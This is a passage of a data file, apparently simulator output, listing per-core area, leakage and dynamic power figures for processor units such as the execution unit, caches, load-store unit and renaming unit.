'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.359667,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 4.19735,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0236579,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.22127,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.135499,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0547817,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0883609,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0446016,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.187744,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0418806,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.13895,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0255986,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00229779,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0251584,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0169936,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.050757,
'Execution Unit/Register Files/Runtime Dynamic': 0.0192914,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0589175,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.162657,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.99634,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.58393e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.58393e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 4.00752e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.55954e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000244114,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000375868,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000434173,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0163364,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.03913,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0400109,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0554856,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.30808,
'Instruction Fetch Unit/Runtime Dynamic': 0.112643,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0430097,
'L2/Runtime Dynamic': 0.0128205,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.92916,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.350503,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0223891,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.022389,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.03488,
'Load Store Unit/Runtime Dynamic': 0.483307,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0552077,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.110415,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0195934,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0202369,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0646095,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0065664,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.254376,
'Memory Management Unit/Runtime Dynamic': 0.0268033,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.3688,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0673379,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00329109,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0269533,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0975823,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.7295,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0234066,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221073,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.132683,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0535458,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.0863674,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0435954,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.183509,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0408985,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.1329,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0250666,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00224595,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0247487,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0166102,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0498153,
'Execution Unit/Register Files/Runtime Dynamic': 0.0188561,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0579915,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.159175,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 0.98799,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 4.43237e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 4.43237e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 3.87605e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 1.50894e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000238607,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000366015,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000419445,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0159678,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.01569,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0389099,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0542338,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.2835,
'Instruction Fetch Unit/Runtime Dynamic': 0.109897,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0418086,
'L2/Runtime Dynamic': 0.0124139,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.91422,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.342888,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0219057,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0219056,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.01766,
'Load Store Unit/Runtime Dynamic': 0.472824,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0540158,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.108031,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0191704,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0197958,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.063152,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.006386,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.252192,
'Memory Management Unit/Runtime Dynamic': 0.0261818,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.3175,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0659386,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0032183,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0263421,
